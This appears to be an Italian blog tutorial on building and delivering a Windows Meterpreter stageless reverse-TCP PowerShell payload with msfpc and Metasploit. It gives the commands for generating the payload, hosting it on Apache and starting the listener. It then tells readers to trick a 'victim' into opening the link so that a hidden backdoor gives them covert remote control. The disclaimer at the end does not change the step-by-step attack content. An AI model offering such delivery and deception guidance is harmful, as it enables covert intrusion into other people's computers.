
windows-meterpreter-stageless-reverse-tcp-443.ps1
Oggi andremo a parlare del payload windows-meterpreter-stageless-reverse-tcp-443.ps1, l’ultimo della serie riguardante Msfvenom Payload Creator. Dopo questo articolo, il famoso tool di Kali Linux ce lo lasceremo alle spalle, per continuare a parlare di nuove vulnerabilità interessanti e funzionanti. Ma ora concentriamoci su quest’argomento.
windows-meterpreter-stageless-reverse-tcp-443.ps1
Per prima cosa apriamo il programma andando nel consueto percorso Applicazioni>Strumenti di Expoiting>MSF Payload Creator. Aperta l’applicazione, il primo comando da eseguire sarà quello necessario per la creazione di tutti i payload che ci potranno servire; a noi ne servirà solo uno, quello di cui stiamo parlando nel seguente articolo; quindi sulla riga di comando digitiamo: /usr/bin/msfpc verbose loop “indirizzo IP locale”;
Se non avete presente il vostro IP potete ricavarlo facilmente aprendo un nuovo terminale per poi digitarvi il comando “ifconfig”.
Terminati i procedimenti riguardanti il primo comando possiamo dar via alla sostanza dell’attacco; eseguiamo il comando msfconsole -q -r ‘/root/windows-meterpreter-stageless-reverse-tcp-443-ps1.rc’
Con questo comando potremo richiamare la console di Metasploit Framework che avrà il compito di mettere in ascolto il terminale, cioè in attesa di informazioni provenienti dal payload che nel frattempo avremo inserito sul PC della vittima. Per fare ciò dobbiamo dapprima trasferire il payload che ci interessa, in questo caso il windows-meterpreter-stageless-reverse-tcp-443.ps1, nel percorso computer>var>www>html;
Concluso questo passaggio possiamo quindi mandare in esecuzione, su di un nuovo terminale, il comando “service apache2 start”.
Conclusione
Bene, adesso non ci resta altro da fare che spedire un link alla vittima la quale, una volta aperto, si ritroverà una bella backdoor sul proprio computer; il link avrà una struttura del tipo “indirizzo ip locale”/windows-meterpreter-stageless-reverse-tcp-443.ps1, dove l’indirizzo IP locale sarà lo stesso di quello trovato precedentemente con il comando ifconfig. Ma attenzione, siate abbastanza intelligenti e furbi da elaborare un metodo convincente per far cadere la vittima nella rete, senza destare sospetti! Quindi, una volta che il payload sia entrato nel sistema remoto, il terminale in ascolto capterà le informazioni e stabilirà una connessione segreta tra il nostro PC e quello della vittima, senza che essa se ne accorga. Da qui in poi potremo eseguire molteplici operazioni sulla macchina remota e, qualora sorgesse qualche dubbio sui comandi, potete tranquillamente consultarne un’amplia lista attraverso il comando help da eseguire sullo stesso terminale in ascolto.
Ricordo che l’articolo su windows-meterpreter-stageless-reverse-tcp-443.ps1 è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un’ incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI